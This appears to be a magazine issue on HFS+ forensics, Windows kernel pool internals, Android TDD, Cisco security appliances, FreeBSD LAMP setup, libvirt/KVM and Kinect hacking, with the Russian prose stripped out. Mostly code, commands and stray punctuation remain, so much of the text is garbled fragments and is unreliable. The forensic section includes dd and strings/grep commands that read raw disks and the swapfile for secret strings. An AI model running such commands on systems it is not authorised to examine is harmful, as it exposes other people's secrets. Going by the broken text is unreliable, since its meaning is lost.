    UInt16 signature;
    UInt16 version;
    UInt32 attributes;
    UInt32 lastMountedVersion;
    UInt32 journalInfoBlock;
    UInt32 createDate;
    UInt32 modifyDate;
    UInt32 backupDate;
    UInt32 checkedDate;
    UInt32 fileCount;
    UInt32 folderCount;
    UInt32 blockSize;
    UInt32 totalBlocks;
    UInt32 freeBlocks;
    UInt32 nextAllocation;
    UInt32 rsrcClumpSize;
    UInt32 dataClumpSize;
    HFSCatalogNodeID nextCatalogID;
    UInt32 writeCount;
    UInt64 encodingsBitmap;
    UInt32 finderInfo[8];
    HFSPlusForkData allocationFile;
    HFSPlusForkData extentsFile;
    HFSPlusForkData catalogFile;
    HFSPlusForkData attributesFile;
    HFSPlusForkData startupFile;
};

catalog file
struct HFSPlusCatalogFile
{
SInt16 recordType;
UInt16 flags;
UInt32 reserved1;
HFSCatalogNodeID fileID;
UInt32 createDate;
UInt32 contentModDate;
UInt32 attributeModDate;
UInt32 accessDate;
UInt32 backupDate;
HFSPlusPermissions permissions;
FInfo userInfo;
FXInfo finderInfo;
UInt32 textEncoding;
UInt32 reserved2;
HFSPlusForkData dataFork;
HFSPlusForkData resourceFork;
};

Catalog file
. Node ID (CNID)
. catalog file
,


CODING

Time Machine
(fork). , Extent overflow file.
fork-
struct HFSPlusForkData
{
UInt64 logicalSize;
UInt32 clumpSize;
UInt32 totalBlocks;
HFSPlusExtentRecord extents;
};

HFS+ , .
, , HFS+.

. ,
. , , HFS+,
Apple.

MacOS HFS HFS+


, ,
. - ,
HFS+ B-
. - ,
B- , . Mac OS X 10.2 2002
Apple HFS+, ,


.
. Mac OS X 10.2
. Mac OS X 10.3
. ,
Mac OS X .
HFS+
, .
. ,
, , :
Catalog file .
Bitmap ,
.
Extent overflow, .
.
, .
,
,
. .
HFS+ :
1. .
2. .
3. .
4. .
5. .
HFS+
.
, .

-
!


? :
1.
2. Catalog File
3.
4.
5.
6. , ( Bitmap),
.
,
. Mac-mini
5-10 . MacBook'
30 . Time Machine, 20 . ,
.
:
mkdir /Volumes/MyVolume
mount -t hfs -r /dev/diskXXXX /Volumes/MyVolume


, bitmap'
.
HFS+ ,
,
.
, . HFS+, ,
dd, ,
. , ,
:).
:
sudo dd if=/dev/disk1 of=./evidence bs=4096 \
skip=4355500 count=1

- ,
, , :
sudo cat /dev/disk1 | strings -o | grep -i \
'secret code' -C 5

,
.
, , , shred,
, .
Mac OS X /var/vm
$ ls -al /var/vm
total 131072
drwxr-xr-x 4 root wheel 136 Oct 14 10:50 .
drwxr-xr-x 24 root wheel 816 Oct 14 10:52 ..
drwx--x--x 18 root wheel 612 Oct 11 11:20 app_profile
-rw------T 1 root wheel 67108864 Oct 14 10:50 swapfile

, :
sudo strings -o /var/vm/swapfile | grep 'secret code' -C 2


,
.

raw-. , /dev/rdisk0s1 EFI , HFS+ /dev/rdisk0s2.
, hfs/hfs_format.h
HFS+, .
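#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <hfs/hfs_format.h>
#include <libkern/OSByteOrder.h>
#include <util.h>

/* Print a buffer as hex bytes */
void dump(unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; ++i)
        printf("%02X ", buf[i]);
    printf("\n");
}

int main(int argc, char *argv[])
{
    // Open the raw device read-only
    int fd = open("/dev/rdisk0s2", O_RDONLY);
    if (fd < 0) {
        perror("open");
        return 1;
    }
    // Structure declared in hfs_format.h
    HFSPlusVolumeHeader volume_header;
    // The volume header starts 1024 bytes from the start of the volume
    ssize_t rd = pread(fd, &volume_header,
        sizeof(volume_header), 0x400);
    if (rd != (ssize_t)sizeof(volume_header)) {
        perror("pread");
        close(fd);
        return 1;
    }
    // On-disk fields are big-endian, so convert before printing
    printf("%u\n", OSSwapBigToHostInt32(volume_header.blockSize));
    dump((unsigned char *)&volume_header, sizeof(volume_header));
    // Close the device
    close(fd);
    return 0;
}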

, raw-,
sudo, .

Time Machine

Mac OS X Leopard, Time


Machine. ,
, . ,
,
.
Time Machine .
Apple Apple Time Capsule,

Time Machine. Time Machine
USB eSata-. Time Machine
, .
Time Machine .
, Time Machine, .

Outro

.
, ,
, . z


CODING
(stannic.man@gmail.com)

Windows? ,
, . , - ,
. ,
. .
, .
,
? , . - , ,
, PDE/
PTE- , ,
.
, , ArtMoney
.
? ,
? , . :).

Windows

, , .
, , .


, , , Windows API, . Windows ,


. Intel x86,
4096 . , / Windows
(ExAllocatePoolWithTag ExFreePoolWithTag),

. , .
.

Windows

Windows, -


1. WinDBG PCRB
(paged) (nonpaged).
, ,
,

pagefile.sys. , , paged- .
Nonpaged-
.

. ,
nonpaged
.

, .
][
Windows. ,
.
,
Windows
,
.

.
,
.

,
, .
,
,

,
,
.

.
.
, PPNPagedLookasideList (LookasideList),

nonpaged- <= 256
. PCR
(processor control
register), ,
IRQL, GDT, IDT .. , PCRB (processor control region),
(. . 1).
Windows 7 KPRCB , , , KPRCB
:

HTTP://WWW
links
hackinthebox.org



.

typedef struct _KPRCB {
    ...
    /*0x5A0*/ struct _PP_LOOKASIDE_LIST PPLookasideList[16];
    /*0x620*/ struct _GENERAL_LOOKASIDE_POOL PPNPagedLookasideList[32];
    /*0xF20*/ struct _GENERAL_LOOKASIDE_POOL PPPagedLookasideList[32];
    ...
} KPRCB, *PKPRCB;


CODING

2.
MmNonPagedPoolFreeListHead
,

.

ExInterlockedPopEntrySList.
, , .
,
<= 4080 . , .
, POOL_DESCRIPTOR:
typedef struct _POOL_DESCRIPTOR
{
enum _POOL_TYPE PoolType;
union {
struct _KGUARDED_MUTEX PagedLock;
ULONG32 NonPagedLock;
};
LONG32 RunningAllocs;
LONG32 RunningDeAllocs;
LONG32 TotalBigPages;
LONG32 ThreadsProcessingDeferrals;
ULONG32 TotalBytes;
UINT8 _PADDING0_[0x2C];
ULONG32 PoolIndex;
UINT8 _PADDING1_[0x3C];
LONG32 TotalPages;
UINT8 _PADDING2_[0x3C];
VOID** PendingFrees;
LONG32 PendingFreeDepth;
UINT8 _PADDING3_[0x38];
struct _LIST_ENTRY ListHeads[512];
} POOL_DESCRIPTOR, *PPOOL_DESCRIPTOR;

, PoolVector
NonPagedPoolDescriptor.


,
ExpNonPagedPoolDescriptor, 16 ,
.
PRCB KNODE,
,
ExpNonPagedPoolDescriptor.
,
MmNonPagedPoolFreeListHead, , ,
4080 . , .
LIST_ENTRY,
, , ( ) ,
.
,
LockQueueNonPagedPoolLock.
ExFreePoolWithTag
,
MmNonPagedPoolFreeListHead .
, , . ,
,
:). , , .

...

, .
, ,
, .
,

. . ,
, Windows Vista/7 .
.
: ,
,
!
(. . 2).
() Windows. , Next Lookaside, PoolOverflow () PendingFrees
( ) ..
, .
,
.
, , , , ...

, , ,
, .
, ,
. ,
Windows
,
.
! z

CODING
RankoR (rankor777@gmail.com, ax-host.ru)

,
: TDD Android

( , )
, . ,
.


20%- 80% . , . ,
, ,
1. ,

(, , ).
.
- (. 1),
, , ,
, -
.

.
, . , .
(. unit testing) , , ,
.
, , , . ,
int32,
,
.
, .
, TDD (. Test Driven Development),
.
, (
) , TDD
, . TDD
2. ,
, , , ,
.


1.
test case
.
.
,
test case 1-2 .
,
.



,



2. TDD
, .
5. .

, . ,
, ,
, ,
. ,
,
,
.


, ,
TDD: ,
- , .
:
1. - (
). ,
,
.
2. . ,
boolean,
return false (
,
true), , .
, .
3. ,

. , .
4. , .

( ) Android.
Android, , Java.

, ,
DVD
true false. , , ,
, 1, 2, 3 ..
dvd
, -

.
( Android (,
, , )
, Eclipse, ADT Android SDK)
. ,
Next
Create a test project.
INFO
.
Java- -
JUnit. JUnit Android SDK, info
, Android .

Wikipedia
.
TestSuite ( ), TestCase .
,
().


CODING

,
test, JUnit , , :).
, <Ctrl> + <F11>.
, Matrix
orderIsRight().
, : return false. ,
: ,
. ,
(, , ) .
orderIsRight() :
public static boolean orderIsRight(
final List<Point> pPoints) {
Point firstPoint = pPoints.get(0);
for (int i = 1; i < pPoints.size(); i++) {
final Point secondPoint = pPoints.get(i);
if (pointsAreInWrongOrder(firstPoint,
secondPoint)) {
return false;
}
firstPoint = secondPoint;
}
return true;
}

pointsAreInWrongOrder() ,
:
return (pFirstPoint.x >= pSecondPoint.x);

, true, , ( ).
. ,
.
.

Android
,
.
public void testValidOrder() {
List<Point> points = new ArrayList<Point>();
points.add(new Point(0, 0));
points.add(new Point(1, 0));
points.add(new Point(2, 0));
points.add(new Point(3, 0));
boolean result = Matrix.orderIsRight(points);
assertTrue(result);
}
public void testInvalidOrder() {
List<Point> points = new ArrayList<Point>();
points.add(new Point(0, 0));
points.add(new Point(3, 0));
points.add(new Point(1, 0));
points.add(new Point(2, 0));
boolean result = Matrix.orderIsRight(points);
assertFalse(result);
}


GUI

.
GUI , , ,
. GUI ,
,
. ,
, . ,
, , , ,
, .
Android SDK
, ActivityInstrumentationTestCase2.
GUI. , ActivityInstrumentationTestCase2 , ..
class MainActivityTest extends ActivityInstrumentationTestCase2<MainActivity>.
Activity (MainActivity),
. , .
Android 2.3.4 Wi-Fi.
, Wi-Fi
, , .


, Adb over
Wi-Fi Android Market (
root). . ,
:

GUI
adb connect 192.168.1.5:31337

GUI ,
. , setUp(),
. , Activity,
:
private Activity mActivity;
private EditText mEditText1;
private EditText mEditText2;
private EditText mEditText3;

:
protected void setUp() throws Exception {
super.setUp();
mActivity = getActivity();
mEditText1 = (EditText)mActivity.findViewById
(com.example.matrix.R.id.editTextLine1);
<...>
mTextView = (Button)mActivity.findViewById(
com.example.matrix.R.id.textView);
}

, :
public void testControlsCreated() {
assertNotNull(mActivity);
assertNotNull(mEditText1);
<...>
assertNotNull(mTextView);
}

,
, , , - - .
,
textView (OK NOT OK).

:
public void testValidData() {
TouchUtils.tapView(this, mEditText1);
sendKeys(KeyEvent.KEYCODE_0, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText2);
sendKeys(KeyEvent.KEYCODE_1, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText3);
sendKeys(KeyEvent.KEYCODE_2, KeyEvent.KEYCODE_SPACE,
KeyEvent.KEYCODE_0);
TouchUtils.tapView(this, mEditText1);
// getText() returns a CharSequence, so compare its String form
assertEquals("OK", mTextView.getText().toString());
}

, . EditText
. -
, , . , -
, ,
:).
,
, Activity ( Activity ) :).

, .
Java Android
JUnit, .
, ,
, ,
,
. z


SYN/ACK
grinder (grinder@tux.in.ua)

CISCO

. .
-, VPN; ,
. ,
Cisco, .

IronPort

Cisco , ,
.
.
, , ,
. , ,
.
-,
. , ,
, .
,
.
, , ,
SaaS .
, .
. Cisco Cisco IronPort Systems LLC
(ironport.com), - ,
-,
. IronPort .
E-mail Security Appliance
( C-Series X-Series, - Web Security
Appliance (S-Series). M-Series.
,
, . M-Series
,
. IronPort .
(,
FTP-).
, WCCPv2 (Web Cache
Communication Protocol). . IronPort
AsyncOS, FreeBSD-

.
10000 ,
DOS-. AsyncOS -


- (Unix Shell ).
,
, (FTP, HTTP(S)).
IronPort
SensorBase. ,
SenderBase .

, SensorBase .
Risk Rating. . Cisco, ,
, ,
30% ,

. IP-
-10 +10. . , ,
200 . , IP-
, IronPort
. ,
(malware, , ..).
, 80%
-
, .
. , , -
Waledac ,
, IronPort, . ,
, SpamAssassin, ,
. IronPort
Risk Rating (,
..), ,
. ,
: , :).
, SensorBase .
, ,
, SensorBase IP-.
, IronPort :
- Anti-Spam Filters CASE
(Context Adaptive Scanning Engine, ), ;
;
- (Cisco IronPort URL Filters),

80- ;

CISCO
Cisco,
. .
eBay
$100 (),
. , ,
, . .
!
Cisco Packet
Tracer (cisco.com/web/learning/netacad/course_catalog/PacketTracer.html),
. PT

.
Cisco (,
, , VPN ..), ,
, .
,
Cisco, RT
.
Packet Tracer Windows XP-7
Linux.
RT Dynamips (ipflow.utc.fr/index.php/Cisco_7200_Simulator) GNS3 (gns3.net).

(IronPort Virus
Outbreak Filters), ,
(Sophos, McAfee);
IronPort, ;
DLP-,
( ).
,
. , IM, Skype, -.
;
- ;

- ( URL, HTTP-
, IronPort
).
-
.
, ,
. IronPort
- .
LDAP-, Active
Directory. IronPort , ,
. Reputation Filter,
DLP
. , .
, IronPort
.
. , ironport.com/try,
.

ASA 5500

,
Cisco, Cisco ASA 5500
Series, (ASA Adaptive Security Appliances),
PIX. ASA 5500
Cisco SDN (Self Defending
Networks, bit.ly/kKmBD5). ASA 5500 , , Adaptive Threat Defense,
.
, VPN
( SSL IPsec), IPS ( ),
URL -,
,
, , Anti-X (
). , , ASA 5500
, .
5500. 2-7


SYN/ACK

Cisco
MARS
eBay Cisco

Cisco ASA 5505


, IM P2P, , . ,

.
. , ,
,
,
( 80). ASA 5500
. Cisco SSL VPN Cisco AnyConnect Cisco Secure Desktop (CSD).
CSD ,
, .

, , , IP-,
. VPN
, LAN (CIFS, HTTP/S, FTP).
, .
VM. .
QoS, , IPv6 , ASA 5500 .
ASA 5500 ,
,
, , DMZ. firewall
, ASA 5500 .
, , (
enterprise-),
, .
, Cisco ASA 5505
Base Security Plus, -


10000 25000 , 10 25
2 VPN, . ,
eBay / ASA 5505 $150,
.
, VPN, GTP/GPRS . VPN-, , ,
ASA 5520
750.
5500 . ,
OpenSource- (Squid, HAVP, SquidGuard, ClamAV, OpenDPI,
OpenVPN ), ,
, . , ,
.
, .
, ?
, ,
( Cisco
? - ! . .).
Cisco
,
. ,
, - .
, .
ASA 5500 Series (, , )
, . ,
, AIP-SSM (Advanced Inspection and Prevention Security
Services Module) CSC-SSM (Content Security and Control Security
Services Module). Cisco
, .

Cisco MARS

SDN Cisco MARS (Monitoring Analysis and Response


System). ( Cisco
NetFlow), . ,
, .
, Cisco ISS
RealSecure Network, McAfee IntruShield/Entercept HIDS, Juniper IDP,
Snort .

Cisco
Cisco Configuration Professional
Cisco Packet Tracer

Cisco GNS3
.

(Qualys Guard ANY, E-Eye, Retina Scanner Vulnerability
CVE).

.
,
.
,
, .
, , .
150 . e-mail, , SNMP.
, , firewall, IDS/IPS ..

,
, .
, MARS
. , Cisco end-of-life , 2011 .
2015 . MARS
, Cisco Security
Manager.

Cisco , , ,
. , ,
*nix,
. z


SYN/ACK
(execbit.ru)


Apache, MySQL PHP, LAMP,


Linux.
FreeBSD .
,
, FreeBSD (L)AMP
,
.

1. FreeBSD

. FreeBSD (www.freebsd.org), Get


FreeBSD Now, ( : 8.2-RELEASE 7.4-RELEASE), (amd64 i386), [ISO]
. : bootonly
, disk1 ISO CD, dvd1
DVD, livefs LiveCD , memstick
USB-.
, DHCP-, (DVD-
, CD ).
, ISO-, , / . .

sysinstall,
. : Express,
,
, . , <Enter>.
.
<A> , <C>,
. , ,
FreeBSD
DOS- ( FreeBSD ) BSD-,
.
<Q>, .
: ,
<Enter> MBR.
BSD-.
,
<A> . <Q>,
.
: .
CD/DVD, <Enter>. <Enter> .
,
. <Enter>, <X>, Yes
<Enter>. . ,
.
root .


2.

FreeBSD, ,
: , root , . .
-, root :
# passwd

.
,
SSH.
adduser:
# adduser

,
( <Enter>),
, (
tcsh) . ,
yes ( ),
no.
root,
wheel:
# pw groupmod wheel -m _

/etc/fstab , ,
/tmp /var.
noexec Options ( ).
:
# chmod 0600 /etc/syslog.conf
# chmod 0600 /etc/rc.conf
# chmod 0600 /etc/newsyslog.conf
# chmod 0600 /etc/hosts.allow
# chmod 0600 /etc/login.conf

. FreeBSD
/etc/rc.conf, :
# ee /etc/rc.conf
hostname="host.com"
ifconfig_em0="inet 1.2.3.4 netmask 0xffffffff"
defaultrouter="5.6.7.8"

em0
.
ifconfig.

DHCP, dhclient.
:
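# ee /etc/rc.conf
# Ignore ICMP redirects
# and log them
icmp_drop_redirect="YES"
icmp_log_redirect="YES"
# Do not answer broadcast pings
icmp_bmcastecho="NO"
# Clear /tmp at boot
clear_tmp_enable="YES"
# Do not rewrite /etc/motd at boot
update_motd="NO"
# Drop TCP packets
# that have both SYN and FIN set
tcp_drop_synfin="YES"
# Disable sendmail
sendmail_enable="NO"
sendmail_submit_enable="NO"
# Enable the SSH daemon
sshd_enable="YES"

# /etc/rc.d/netif restart

:
# ping execbit.ru

, <Esc> <A>.
DNS- /etc/resolv.conf:
# ee /etc/resolv.conf
nameserver 8.8.8.8

,
:
/etc/sysctl.conf:
# ee /etc/sysctl.conf
# Do not answer with RST or ICMP unreachable
# to packets sent to closed TCP and UDP ports
net.inet.tcp.blackhole=2
net.inet.udp.blackhole=1
# Hide other users' processes from everyone except root
# (kern.ps_showallprocs was replaced by this sysctl in FreeBSD 5.x)
security.bsd.see_other_uids=0

( DoS-
)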

SSH- -:
# echo "MaxStartups 5:50:10" >> /etc/ssh/sshd_config
# /etc/rc.d/sshd restart

SSH- 50%
, .
, .
-, ( )
FreeBSD ,
( , ,
):
# portsnap fetch extract

, :


SYN/ACK

Webmin
# freebsd-update fetch
# freebsd-update install
# shutdown -r now

, rkhunter, ,
:
# cd /usr/ports/security/rkhunter
# make install clean

/usr/local/etc/rkhunter.conf , MAIL-ON-WARNING email,
.
:
# rkhunter --update

,
:

# crontab -e
0 2 * * * /usr/local/sbin/ntpdate pool.ntp.org

, Webmin, web-
(,
SSH, ):
# cd /usr/ports/sysutils/webmin
# make install clean
# echo 'webmin_enable="YES"' >> /etc/rc.conf

Webmin:
# /usr/local/lib/webmin/setup.sh

<Enter>,
( Login password:), Webmin (,
). Webmin:
# /usr/local/etc/rc.d/webmin start

# rkhunter --propupd

/etc/periodic.conf ,

:
# echo 'daily_rkhunter_update_enable="YES"' >> \
/etc/periodic.conf
# echo 'daily_rkhunter_check_enable="YES"' >> \
/etc/periodic.conf

, /var/log/rkhunter.log
email.
cron
:


, https://host.com:10000/
.

AMP

AMP, -
Apache, MySQL PHP.
Apache. :
# cd /usr/ports/www/apache22
# make config install clean

,

. - ,
<Enter>.

/tmp /var
( SSL ,
):
# echo 'apache22_enable="YES"' >> /etc/rc.conf
# echo 'apache22ssl_enable="YES"' >> /etc/rc.conf


accf_http, HTTP, SYN-:
# echo 'accf_http_ready="YES"' >> /etc/rc.conf
# kldload accf_http

PHP :
# cd /usr/ports/lang/php5
# make config install clean

, Build Apache module .


:

FreeBSD
# mkdir /home/www/cgi-bin

/
home/www , -, /home
( ,
, /home
), -, , /usr/local/www/apache22/data,
.
4. :
<Directory /usr/local/www/apache22/data>

,
DocumentRoot:
<Directory /home/www/data>

5. :
<ifModule dir_module>

# cd /usr/ports/lang/php5-extensions
# make config install clean

, PHP MySQL database support,


PHP MySQL.
.
Apache
( FreeBSD : /usr/local/etc/apache22/
httpd.conf) :
1. LoadModule :
AddType application/x-httpd-php .php
AddType application/x-httpd-php-source .phps

2. ServerAdmin :
ServerAdmin me@site.com

3. DocumentRoot , -:

DirectoryIndex index.html
</ifModule>

:
<ifModule dir_module>
DirectoryIndex index.php index.html
</ifModule>

6. <ifModule alias_module> :
ScriptAlias /cgi-bin/ "/usr/local/www/apache22/cgi-bin/"

:
ScriptAlias /cgi-bin/ "/home/www/cgi-bin/"

7. :
<Directory "/usr/local/www/apache22/cgi-bin">

:
DocumentRoot "/home/www/data"

<Directory "/home/www/cgi-bin">

PHP:
# mkdir /home/www
# mkdir /home/www/data

# cp /usr/local/etc/php.ini-recommended /usr/local/etc/php.ini


SYN/ACK


Apache
PHP. MySQL.
:
# cd /usr/ports/databases/mysql50-server
# make WITH_OPENSSL=yes install clean

,
:
# ee /etc/my.cnf
[client]
port=29912
[mysqld]
port=29912
bind-address=127.0.0.1

PHPMyAdmin,
web-:
# cd /usr/local/www/phpMyAdmin
# cp config.sample.inc.php config.inc.php
# ee config.inc.php
$cfg['blowfish_secret'] = '';

Apache
:
1. <IfModule alias_module> :
Alias /phpmyadmin /usr/local/www/phpMyAdmin

2. <Directory> :

MySQL :
# echo 'mysql_enable="YES"' >> /etc/rc.conf
# /usr/local/etc/rc.d/mysql-server start

:
# mysqladmin -u root password
# mysql -u root -p

MySQL ,
, ,
MySQL,
- . - MySQL
PHPMyAdmin:
# cd /usr/ports/databases/phpmyadmin
# make install clean


<Directory "/usr/local/www/phpMyAdmin">
Order allow,deny
Allow from all
</Directory>

Allow from all - Allow


from 123.456.789.0/12, PHPMyAdmin
.
Apache:
# /usr/local/etc/rc.d/apache22 restart

, (L)AMP .

HTTPS

PHPMyAdmin HTTPS,

Apache PHP
,
. , Apache
.
OpenSSL (/etc/ssl/openssl.cnf), :
#
dir = /root/sslCA
# (~10 )
default_days = 3650


:
# cd /root
# mkdir sslCA
# chmod 700 sslCA
# cd sslCA
# mkdir private
# openssl req -new -x509 -days 3650 -extensions v3_ca \
-keyout private/cakey.pem -out cacert.pem \
-config /etc/ssl/openssl.cnf

, :
# ls -l cacert.pem private/cakey.pem

Apache /etc/ssl:
# cd /root/sslCA
# openssl req -new -nodes -out _-req.pem \
-keyout private/_-key.pem -config /etc/ssl/openssl.cnf
# openssl ca -config /etc/ssl/openssl.cnf -out \
_-cert.pem -infiles _-req.pem

# cp /root/sslCA/_-cert.pem /etc/ssl/crt
# cp /root/sslCA/private/_-key.pem /etc/ssl/key

Apache, :
# ee /usr/local/etc/apache22/httpd.conf
#Include etc/apache22/extra/httpd-ssl.conf

/usr/local/etc/apache22/extra/httpd-ssl.conf:
# ee /usr/local/etc/apache22/extra/httpd-ssl.conf
# HTTPS-
ServerName ssl.host.com
# ,
SSLCertificateFile /etc/ssl/crt/yourhostname-cert.pem
SSLCertificateKeyFile /etc/ssl/key/yourhostname-key.pem
# ,
DocumentRoot "/home/www/data"
#
ErrorLog "/var/log/httpd-error.log"
TransferLog "/var/log/httpd-access.log"

Apache:
# /usr/local/etc/rc.d/apache22 restart

,
(L)AMP FreeBSD ( FAMP), ,
,
/home/www/data ( /home/www/cgi-bin).
(L)AMP. z


SYN/ACK
(execbit.ru)



QEMU, KVM, ,
,
. , .
, KVM QEMU ,
,
. QEMU

.
KVM , .
,
,
.
QEMU+KVM
,

QEMU.

virsh

virt-install,
- ,
virsh,
(, , libvirt,
):

, QEMU+KVM.
,
,
. ,
libvirt.
Libvirt ,
. ,
libvirt, , -,
,
. -, libvirt , KVM Xen
VMware OpenVZ. ,
,
( , , libvirt,
).
-, libvirt ,
, -
, .
, libvirt,
.


virsh libvirt.
,
. ,
,
libvirt,
, virsh .
virsh libvirt,

( KVM, QEMU, dnsmasq bridge-utils).
,
( Ubuntu):
$ sudo apt-get install bridge-utils dnsmasq kvm \
qemu libvirt libvirt-bin

$ sudo apt-get install virtinst

virsh ,
libvirtd.

, (, ArchLinux)
. , libvirtd :
$ ps ax | grep libvirtd

, (
init.d rc.d):
$ sudo /etc/init.d/libvirtd start

:
$ sudo virsh --connect qemu:///system version
$ sudo virsh --connect qemu:///system list


virt-install

ACPI

virt-install .
,
, '-d',

~/.virtinst/virt-install.log.


ACPI,
QEMU. ,
'--noacpi' '--noapic'
( ) virt-install.

INFO

info



:
sudo virsh attach-disk \
--driver file --type cdrom --mode readonly \
/var/lib/libvirt/images/cdrom.iso sdc

,
:
: libvir 0.9.0
: libvir 0.9.0
API: QEMU 0.9.0
: QEMU 0.14.0

.
virsh '--connect'
(sudo virsh version), libvirt
.
,
'--connect'. libvirt

SSH-. ( '-c' '--connect'):
$ virsh -c \
qemu+ssh://root@host.com/system

. ,
, virsh.
, , , .

virt-install :

$ sudo virt-install --connect qemu:///system \
--name vm1 \
--ram 512 \
--vnc \
--os-type linux \
--os-variant ubuntumaverick \
--accelerate \
--network=network:default \
--disk \
path=/var/lib/libvirt/images/vm1.img,size=5 \
--cdrom /tmp/ubuntu-10.10-server-i386.iso \
--noautoconsole

:
# virsh dumpxml vm1 > ~/vm1.xml
# vi vm1.xml
# virsh create vm1.xml


QEMU.
vm1 ( '--name'), 512
('--ram'),
VNC- ( ,
).

Linux ('--os-type linux')
Ubuntu 10.10 ('--os-variant
ubuntumaverick'),
('--accelerate').
'network' .
:
1. bridge:_


SYN/ACK

virt-manager


Ubuntu
1. /etc/network/interfaces,
(
IP-, ):
auto lo
iface lo inet loopback
auto br0
iface br0 inet static
address 192.168.0.10
network 192.168.0.0
netmask 255.255.255.0
broadcast 192.168.0.255
gateway 192.168.0.1
bridge_ports eth0
bridge_fd 9
bridge_hello 2
bridge_maxage 12
bridge_stp off

2. :
$ sudo /etc/init.d/networking restart

3. dhcdbd:
$ sudo /etc/init.d/dhcdbd stop
$ sudo update-rc.d -f dhcdbd remove

.
. ,
( Ubuntu).
2. network:_
. ,
, NAT. ,
, - .
_ /var/lib/libvirt/network, xml.
, :
# virsh net-list --all


virt-df
3. user , SLIRP.
,
.
'--disk' libvirt
, .
,
'size'. 'sparse', ,
(sparse=true, )
(sparse=false).
,
, 'size'.
. ,
, -,
, -,
.
/var/lib/libvirt/images LVM- ( NFS
POHMELFS, ). ,
.
'--cdrom'
ISO-. ,
/tmp .
,
ISO-:
--cdrom ftp://host.com/images/ubuntu/

, initrd,
:
--location http://ftp.us.debian.org/debian/dists/etch/main/installer-amd64/

, , .

virt-manager
('--noautoconsole')
. 'vcpus'
'cpuset',

( , ).
, /etc/libvirt/qemu/vm1.xml
.

'virsh list'. , .
.
,
virt-viewer,
:
$ sudo apt-get install virt-viewer
$ virt-viewer -c qemu:///system test


, virt-install
. ,
, , , .

,
'console vm1',
'dominfo vm1', - (
libvirtd) 'autostart
vm1', ( 'save'),
('resume '), ('shutdown'), ('start'),
('destroy'),
('attach-device'),
,
:

WARNING
warning
SeLinux,
Fedora
,


,
/var/lib/libvirt/images.

$ sudo virt-clone \
--connect=qemu:///system -o vm1 -n vm2


vm2,


SYN/ACK

virt-manager
vm1, .
'virt-clone' , , .

, libvirt-
:
$ sudo virsh migrate --live vm136 \
qemu+ssh://host2.com/system

:
$ sudo virsh -c qemu+ssh://host2.com/system list

virsh
, , GUI web-,
. virt-manager,
.

virt-manager

virt-manager (virt-manager.org)
, ,
virt-install, virt-clone virt-viewer.
, Red Hat,
libvirt. , - ,
.
virt-manager
( ) , , (,
QEMU)
.

, , , , ,


( ).
, virt-install.
,
, ,
(, ACPI NetBSD)
.
.
, , .
.

,
, (
, , , ),
, , /
.

( ,
)
.

. libvirt.org/apps.html ,
libvirt . , :
virt-top (people.redhat.com/~rjones/virt-top) TOP-
.
top.
virt-df (people.redhat.com/~rjones/virt-df) df,

.

vnc-viewer
virt-p2v (people.redhat.com/~rjones/virt-p2v)
.
virt-v2v (git.fedorahosted.org/git/?p=virt-v2v.git;a=summary)
,
, qemu-kvm.

Web-

Web- Karesansui,
2.0.
Web2.0- ,
virt-manager.
, , Web-
.
Karesansui Python-
SQLite Java- tightVNC-java,
, VNC libvirtd. web-
jQuery.
,
Archipel (archipelproject.org), Jabber-,
,
IM-, , ,
.
,
- .
jabber-.
, ,

, ,
Jabber- 2000

, .
, XMPP, Archipel
Web-,
, .
Karesansui.
:
;
Archipel;

;
;
,
XMPP S2S.
libvirt. , , Amazon EC2
Eucalyptus (open.eucalyptus.com) OpenStack (openstack.org),

OpenNode (opennode.activesys.org)
Adobe Flex Sun/Oracle Java AbiCloud (community.abiquo.com).

Linux ,
.
QEMU KVM, ,
. z

PHREAKING
(po@kumekay.com)

RGB-

KINECT:


Kinect Xbox 360


. 2010 ,
:
2 10 . ,
PC, !
Kinect , . ,
xbox-zone.ru, ,
ifixit.com
, . , Kinecta :
1. RGB-,
-: 640x480 30
.
2. , .

3. , , .
4.
.
5. , .
6. PrimeSensor ,
-, 3D-.

Kinect, ,
, .
Faast
xbox,
, USB ,
12 (
).
Microsoft $34,99, ,
(s.dealextreme.com/search/kinect+power+supply)
.
.

, Adafruit $3000 ,
. ,
,
github.com/OpenKinect/libfreenect.
,
OpenGL .
, apache 2.0,
,
(java, matlab, python, ruby).
. Kinect Microsoft,
PrimeSense. Kinect , NUI (natural user interface) ,

,
, .
open source-.
.
,
!
, , Faast (goo.gl/tu8Gs). PrimeSensor : Kinect Camera,
Kinect Motor Kinect Audio.
, OpenNI
PrimeSense NITE.
OpenNI ,

(Natural Interactions). OpenNI , ,
,
. , , :
goo.gl/xRuuU.
NITE , OpenNI. ,
, PrimeSense,
, .

Ultraseven
0KOIk2JeIBYClPWVnMoRKn5cdY4=. .
NITE : goo.gl/6uhJJ.
xml-.
: goo.gl/5e1nz.
, , .
SamplesConfig.xml KinectXMLs\OpenNI Data
OpenNI ( , C:\Program Files\), KinectXMLs\NITE
C:\Program Files\Prime Sense\NITE\Data.

, !

, .
, . Faast (Flexible Action and Articulated Skeleton Toolkit)
,
,
.
,
PC. projects.ict.usc.edu/mxr/faast/.
. , .
, World of Warcraft:
#
# :
# __ __
left_arm_out 10 key a
left_arm_across 10 key d
lean_forwards 15 key w
lean_backwards 10 key s
left_arm_forwards 20 key tab
right_arm_forwards 20 key 1
right_arm_up 12 key 4
right_arm_across 15 key 2
right_arm_out 15 key 3

, , , .
, ,
, .
.
.

Kinemote
.
- XBMC . , . kinemote.net.
,
, , ,
, .

Ultraseven
, ,
Ultraseven.
.
, . , ,
,
. ,
. ,
,
. : code.google.com/p/kinect-ultra/.

! , ,
-,
: , .
OpenNI ( C++, C#) Microsoft Visual Studio 2010,
.
, ,
.
Nui.Vision.dll goo.gl/XNjq4.
.
Visual Studio WPF Application
OpenNi.net.dll (
, OpenNI) Nui.Vision.dll ( ).
.

MainWindow.xaml 662x520 , , ,
:
<Image Name="imgCamera" />
<Canvas Name="LayoutRoot" />

MainWindow.xaml.cs :
using System.ComponentModel; // BackgroundWorker
using Nui.Vision;            // NuiUserTracker (Nui.Vision.dll)

NuiUserTracker
. ,
SamplesConfig.xml OpenNI Debug
Release .
:
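NuiUserTracker _skeleton;                          // skeleton tracker
BackgroundWorker _worker = new BackgroundWorker(); // background worker
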